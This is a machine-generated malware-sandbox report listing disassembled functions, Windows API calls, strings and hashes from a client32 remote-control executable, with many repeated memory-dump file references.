Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassNameWindow
String ID: NSSStudentUIClass
API String ID: 697123166-3999015762
Opcode ID: 3fb9db8458a88a78d35601a9ef235af905ab503700d79d2a10555305fb949ac3
Instruction ID: 728304f414a7be6f4cf75691dbb641e20f8a7f235b9e66cc4967e63102a5c4c4
Opcode Fuzzy Hash: 3fb9db8458a88a78d35601a9ef235af905ab503700d79d2a10555305fb949ac3
Instruction Fuzzy Hash: 1F01D471E0162BAFDB00DF718904AAEFBB8EB44215F1141B8EC14A3200D730B9018BD3

Function 110CF020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,11190240,?), ref: 110CF052

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\CTL32\NSMString.cpp, xrefs: 110CF065
pszBuffer[1024]==0, xrefs: 110CF06A

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5

Function 110CF0A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\CTL32\NSMString.cpp, xrefs: 110CF0DE
pszBuffer[1024]==0, xrefs: 110CF0E3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5

Function 110274C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(1117B47B,InternetReadFile), ref: 110274D4
SetLastError.KERNEL32(00000078,00000000,?,1102976A,1117B47B,00000000,1102C191,?), ref: 110274FD

Strings

InternetReadFile, xrefs: 110274CE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetReadFile
API String ID: 199729137-1824561397
Opcode ID: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
Instruction ID: 7102dc40746974abd302d7ecd2b68d0a8047dc71c6fa1f41d10cf5a704a59d5e
Opcode Fuzzy Hash: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
Instruction Fuzzy Hash: 16F01272A00628AFD754DFA9E944F97B7E8EB49711F40842AF99597640C770F810CFA1

Function 110357B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetTouchInputInfo), ref: 110357C4
SetLastError.KERNEL32(00000078), ref: 110357ED

Strings

GetTouchInputInfo, xrefs: 110357BE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: GetTouchInputInfo
API String ID: 199729137-2645705246
Opcode ID: 10c41ff3f6d42deed21e7e2a21c2cb8f3ae54b01ca1ecf88037c24ed306f470b
Instruction ID: 6c704fc084d9c209ada407b9a0c733f7d943ecdbd0845790b09f7fc4fb0b7951
Opcode Fuzzy Hash: 10c41ff3f6d42deed21e7e2a21c2cb8f3ae54b01ca1ecf88037c24ed306f470b
Instruction Fuzzy Hash: B6F08276A11728AFD314CF98E844F9BB7E8EF4CB11F00491AF949D7240C671E810CBA0

Function 11075520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11075536
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeferErrorExitLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 889670253-2830328467
Opcode ID: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
Instruction ID: 0f53da842d51b2bc1a575ce598d94f232e02cc1422780aacd45dca11e73889ea
Opcode Fuzzy Hash: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4

Function 11017000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
SetLastError.KERNEL32(00000078), ref: 11017039

Strings

QueueUserWorkItem, xrefs: 1101700E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0

Function 11031020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
SetLastError.KERNEL32(00000078), ref: 11031055

Strings

ProcessIdToSessionId, xrefs: 1103102E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ProcessIdToSessionId
API String ID: 199729137-2164408197
Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0

Function 11157300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D

Strings

..., xrefs: 1115732B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_memset
String ID: ...
API String ID: 243528429-1685331755
Opcode ID: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
Opcode Fuzzy Hash: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0

Function 11027510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(1117B47B,InternetCloseHandle), ref: 11027524
SetLastError.KERNEL32(00000078,00000000,?,110297FB,1117B47B), ref: 11027541

Strings

InternetCloseHandle, xrefs: 1102751E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetCloseHandle
API String ID: 199729137-3843628324
Opcode ID: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
Instruction ID: 0efa5e4b185ac2da0920bc638d9d3d9410d8270d4334fbfed3ee5fbf9e412b31
Opcode Fuzzy Hash: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
Instruction Fuzzy Hash: 20E09272A007345BC320DFA9E844A46F7E8DB24765F40453BEA4197200C670E4448BE0

Function 11035770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,CloseTouchInputHandle), ref: 11035784
SetLastError.KERNEL32(00000078), ref: 110357A1

Strings

CloseTouchInputHandle, xrefs: 1103577E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: CloseTouchInputHandle
API String ID: 199729137-251360538
Opcode ID: c5c51cc3416df1740feb99d5a79384ace3f2b2c8a6160679b09382d954a17126
Instruction ID: 5579ed7c47e3ef80365c35dbc64790a79754191371e6850b1d9de20976132785
Opcode Fuzzy Hash: c5c51cc3416df1740feb99d5a79384ace3f2b2c8a6160679b09382d954a17126
Instruction Fuzzy Hash: C1E09232A506259FC315DFA9E848A46F7D8EF54722F00843AE65597100C631A4408BA0

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001096
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
